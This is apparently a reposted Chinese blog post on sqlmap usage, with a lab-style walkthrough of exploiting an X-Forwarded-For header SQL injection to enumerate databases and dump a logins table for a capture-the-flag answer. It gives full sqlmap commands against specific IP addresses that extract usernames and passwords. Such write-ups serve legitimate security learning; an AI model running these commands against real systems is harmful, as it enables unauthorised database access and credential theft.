sqlmap使用和X-Forwarded-For注入漏洞測試


sqlmap的參數:

sqlmap -r 1.txt --batch -D webcalendar -T logins -C "loginip,logintime,username,password,status" --dump http://219.153.49.228:43259

  • -r **.txt 從一個文件中載入HTTP請求。
  • --batch 從不詢問用戶輸入,使用所有默認配置。
  • -D 庫名 要進行枚舉的指定數據庫名
  • -T 表名 要進行枚舉的指定數據庫表(如:-T tablename –columns)
  • -C 列名 要進行枚舉的數據庫列
  • --dump 轉儲數據庫管理系統的數據庫中的表項
  • --dbs  枚舉數據庫管理系統數據庫
  • --current-db 檢索網站當前數據庫
  • --users 檢索所有數據庫用戶
  • --current-user 檢索當前數據庫用戶

指定參數進行掃描,而不是掃描所有參數,這樣可以避免浪費時間到非注入點參數上,從而提高掃描效率。比如掃描以下URL,已知Submit是靜態參數,id是動態的,那么在掃描的時候只需要指定id就行了,指定多個參數時用雙引號包起來,並以逗號分隔。也可以指定HTTP請求頭中的參數,如User-Agent

python sqlmap.py -r d:\3.txt --level 2 -p KeyWord

 

指定數據庫和版本

python sqlmap.py -u http://www.any.com/wcms/show.php?id=33 --dbms mysql 5.0 --current-db

 

 

sqlmap成功后會在該目錄下生成ip命名的文件夾 root@kali:~/.sqlmap/output/ip

 

 

 

X-Forwarded-For也稱作XFF,是在http頭中的一個參數

X-Forwarded-For(XFF)是用來識別通過HTTP代理或負載均衡方式連接到Web服務器的客戶端最原始的IP地址的HTTP請求頭字段。

1、任務介紹

 

 

 2、漏洞頁面

 

 

 

 

 

 

3、提交任意信息看看結果,提示ip已記錄,證明此處與數據庫有交互

 

  

 

4、添加XFF參數,提交任意數據看看:

 

 可正常提交,存在XFF注入漏洞:

 

 用1.1.1.1的ip構造http文件,使用sqlmap -r 1.txt --dbs --batch http://219.153.49.228:45804,跑不出來庫,后來用的*號才可以(ps:這里不是很懂,為什么用*號就可以跑出來了)

 

 用1.1.1.1跑不出來

 

 

 換*號后,跑出兩個數據庫和payload:

 

用sqlmap -r 11.txt -D webcalendar --tables --batch http://219.153.49.228:45804跑出表名

 

 

 繼續跑字段和內容:

 

用戶名和口令已出來:

 

 

 

 登錄后獲取flag

 

 

 

參考:

Sqlmap使用教程【個人筆記精華整理】_數據庫_TT小子的博客-CSDN博客(參數介紹很詳細全面!!)

sqlmap指定位置注入 - 御用閑人 - 博客園 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM